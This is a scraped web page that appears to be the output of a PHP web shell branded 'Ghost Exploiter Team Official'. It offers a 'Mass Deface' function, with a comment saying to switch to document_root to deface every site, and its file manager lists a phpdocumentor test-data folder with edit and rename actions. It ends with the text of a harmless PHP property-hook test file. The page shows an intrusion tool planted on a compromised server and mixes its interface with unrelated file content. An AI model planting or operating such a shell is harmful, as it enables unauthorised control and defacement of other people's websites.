Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
phpdocumentor
/
reflection
/
tests
/
integration
/
data
/
PHP84
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
AsymmetricAccessor.php
0.092KB
edt
ren
AsymmetricPropertyPromo
...
0.146KB
edt
ren
PropertyHook.php
0.675KB
edt
ren
PropertyHookAsymmetric.php
0.51KB
edt
ren
PropertyHookPromotion.php
0.848KB
edt
ren
PropertyHookVirtual.php
1.556KB
edt
ren
<?php declare(strict_types=1); class PropertyHook { private bool $modified = false; /** @var string this is my property */ #[Property(new DateTimeImmutable())] public private(set) string $example = 'default value' { get { if ($this->modified) { return $this->foo . ' (modified)'; } return $this->foo; } set(string|int $value) { $this->foo = strtolower($value); $this->modified = true; } } }